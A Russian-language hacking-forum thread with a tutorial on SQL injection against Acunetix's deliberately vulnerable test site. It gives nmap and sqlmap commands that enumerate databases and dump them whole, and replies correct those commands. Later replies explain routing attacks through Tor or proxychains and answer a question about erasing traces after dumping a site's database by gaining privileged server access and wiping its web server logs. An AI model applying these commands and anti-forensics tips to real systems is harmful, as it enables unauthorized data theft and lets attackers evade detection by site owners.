Приветствую! В этой публикации хотел затронуть тему SQL-инъекций и показать на примере Acunetix демонстрацию обнаружения возможности внедрения SQL-иньекции в заранее уязвимый ресурс.

https://forum.antichat.xyz/attachments/4773235/img_e2cc7ac664.png

Сразу перейдем к делу, заходим на сайт Acunetix:

> http://www.vulnweb.com

И выбираем:

> http://testphp.vulnweb.com

https://forum.antichat.xyz/attachments/4773235/img_3ad196ce8f.png


Это действие, предоставит нам уязвимую к SQL-инъекции страницу.

https://forum.antichat.xyz/attachments/4773235/img_f03c28a6d5.png

Немного теории:

Сканер, который мы будем использовать – nmap. Он содержит в себе скрипты для использования уязвимостей SQL - NSE Script. И возможности для сканирования на уязвимости (SQL – инъекции) веб-приложений.

Spider HTTP, включенный в nmap ищет в URL-адресах запросы уязвимые для SQL атак.

Он также извлекает формы из найденных сайтов и пытается определить поля, которые являются уязвимыми.

Скрипт Spider HTTP сначала ищет URL-адреса, содержащие запросы. Затем, он переходит к комбинированию команд SQL, созданных для восприимчивых URL-адресов, чтобы получить ошибки. Ошибки анализируются, чтобы увидеть, является ли URL уязвимым для атак. При этом используется самая основная форма инъекции SQL.

Теперь введите следующую команду для сканирования цели на возможность проведения SQL инъекций.

> nmap -sV –script=http-sql-injection www. testphp.vulnweb.com –p 80

Результатом будет список возможных SQL запросов:

https://forum.antichat.xyz/attachments/4773235/img_34466fc97d.png

Выберем один из них:

https://forum.antichat.xyz/attachments/4773235/img_7b8f80f83e.png

И обратимся к уязвимой странице, исключив http:// из запроса.

https://forum.antichat.xyz/attachments/4773235/img_76846f739a.png

Затем используем sqlmap, выполнив следующую команду:

> sqlmap -u http://testphp.vulnweb.com/search.php?test=query' 0R sqlspider –dbs –batch

https://forum.antichat.xyz/attachments/4773235/img_6b57bc4d81.png


Результат сканирования – список доступных баз данных:

https://forum.antichat.xyz/attachments/4773235/img_2d2d36b92b.png

Следующим шагом будет получение всей доступной информации и найденной базе данных, выполняем команду:

> sqlmap -u http://testphp.vulnweb.com/search.php?test=query' 0R sqlspider –D acuart –dump-all

https://forum.antichat.xyz/attachments/4773235/img_5b702c2f52.png


The end…

Vander сказал(а):

Приветствую! В этой публикации хотел затронуть тему SQL-инъекций и показать на живом примере их использование и работу.

Сразу перейдем к делу, заходим на сайт Acunetix:

> http://www.vulnweb.com

И выбираем:

> http://testphp.vulnweb.com


Это действие, предоставит нам уязвимую к SQL-инъекции страницу.

Немного теории:

Сканер, который мы будем использовать – nmap. Он содержит в себе скрипты для использования уязвимостей SQL - NSE Script. И возможности для сканирования на уязвимости (SQL – инъекции) веб-приложений.

Spider HTTP, включенный в nmap ищет в URL-адресах запросы уязвимые для SQL атак.

Он также извлекает формы из найденных сайтов и пытается определить поля, которые являются уязвимыми.

Скрипт Spider HTTP сначала ищет URL-адреса, содержащие запросы. Затем, он переходит к комбинированию команд SQL, созданных для восприимчивых URL-адресов, чтобы получить ошибки. Ошибки анализируются, чтобы увидеть, является ли URL уязвимым для атак. При этом используется самая основная форма инъекции SQL.

Теперь введите следующую команду для сканирования цели на возможность проведения SQL инъекций.

> nmap -sV –script=http-sql-injection www. testphp.vulnweb.com –p 80

Результатом будет список возможных SQL запросов:

Выберем один из них:

И обратимся к уязвимой странице, исключив http:// из запроса.

Затем используем sqlmap, выполнив следующую команду:

> sqlmap -u http://testphp.vulnweb.com/search.php?test=query' 0R sqlspider –dbs –batch


Результат сканирования – список доступных баз данных:

Следующим шагом будет получение всей доступной информации и найденной базе данных, выполняем команду:

> sqlmap -u http://testphp.vulnweb.com/search.php?test=query' 0R sqlspider –D acuart –dump-all


The end…


Автор красавчик

kiira сказал(а):

Вопросы новичка:

1) Как находить такие сайты? Через приватные дорки?



Такие это какие? Для тестирования как в примере или вообще любой сайт с уязвимостями?

kiira сказал(а):

filtered http


Статус filtered Nmap получает когда не может определить, открыт ли порт, т.к. фильтрация пакетов не позволяет достичь запросам Nmap этого порта.

Не в обиду ТС, но тут тема самой SQL инъекции как вектора атаки не раскрывается... Здесь идет обзор возможности сканера уязвимостей Acunetix и небольшой обзор утилиты SQLmap в случаи нахождения простенькой инъекции)

~~DarkNode~~ сказал(а):

Не в обиду ТС, но тут тема самой SQL инъекции как вектора атаки не раскрывается... Здесь идет обзор возможности сканера уязвимостей Acunetix и небольшой обзор утилиты SQLmap в случаи нахождения простенькой инъекции)


Верно, я немного поправлю текст, так как, только начал рассматривать Acunetix

Вот настоящая эксплуатация и поиск SQL уязвимости, чисто сайт полиции заинжектил, только руки, без сканеров
Его еще посадили.

Sniff сказал(а):

Ваша команда D acuart –dump-all почему то не сработала


Потому что должно быть -–dump-all. Двойное тире перед dump


Sniff сказал(а):

получилось с такой командой


Вывод таблиц и дамп базы данных - разные вещи.


Dosia сказал(а):

Вот настоящая эксплуатация и поиск SQL уязвимости, чисто сайт полиции заинжектил, только руки, без сканеров


А что там человек руками сделал? Зарегистрировался на сайте. Все остальное - работа в различных программах.

Citizen0 сказал(а):

А что там человек руками сделал? Зарегистрировался на сайте. Все остальное - работа в различных программах.


А потом его вообще посадили

При вводе команды
nmap -sV –script=http-sql-injection www. testphp.vulnweb.com –p 80
выдает такой результат
Failed to resolve "–script=http-sql-injection".

Amf сказал(а):

При вводе команды
nmap -sV –script=http-sql-injection www. testphp.vulnweb.com –p 80
выдает такой результат
Failed to resolve "–script=http-sql-injection".


Перед script должно быть 2 тире
Уберите пробел между www.иtestphp

Citizen0 сказал(а):

Перед script должно быть 2 тире
Уберите пробел между www.иtestphp

разобрался спс)

Автор красава!

да только мне не понятно почему при вкл anonsurf, nmap не хочет сканить вышеуказанный сайт???

Xulinam сказал(а):

да только мне не понятно почему при вкл anonsurf, nmap не хочет сканить вышеуказанный сайт???



иногда nmap надо указать порт и адрес сокса.

ghostphisher сказал(а):

иногда nmap надо указать порт и адрес сокса.


пример можно)

--proxy http://127.0.0.1:9050

ghostphisher сказал(а):

--proxy http://127.0.0.1:9050

спс) буду пробовать))))

Смысл в том, что тот же анон открывает порты тор

По теме

https://www.shellhacks.com/ru/anonymous-port-scanning-nmap-tor-proxychains/

ghostphisher сказал(а):

Смысл в том, что тот же анон открывает порты тор

По теме

***Скрытый текст***


буду пробовать через пару часиков))

просто нe вижу смыслa тут nmap если sqlmap может тоже весь сайт прошерстить на уязвимость

a113 сказал(а):

а nmap с его скриптами - это достаточно "обширная программа".


..которая еще и уязвимости помимо sql поискать может

a113 сказал(а):

да, но используя разные инструменты больше вероятность найти уязвимость. Допустим скрипт nmap`a что-то найдет, в то время, как sqlmap пропустит. Только дело в том, что sqlmap - инструмент, направленный исключительно на (как ни странно) поиск sql уязвимостей, а nmap с его скриптами - это достаточно "обширная программа".


согласен у каждой программы свой выхлоп!! и только с помощью проб узнаем что лучше )

Как очистить следы после атаки через SQLmap ? Допустим нашел в уязвимом сайте зашел на базу → таблицы → DUMP ALL, какие нибудь логи остаются на сайте(мой IP и т.д.) Как можно от этого всего избавиться ?

Конечно, в логах веб сервера..
Как почистить?
Получить привилегированный полный доступ к серверу и почистить access.log и error.log

IioS сказал(а):

Используй тор




Код:



sqlmap -u site.com --tor


, или прокси




Код:



proxychains4 sqlmap -u site.com


(поищи инфы много) на случай если не получиться получить доступ, лог не почистишь, зато будет слой анонимности


Я ropeadope до сих пор пользуюсь при необходимости)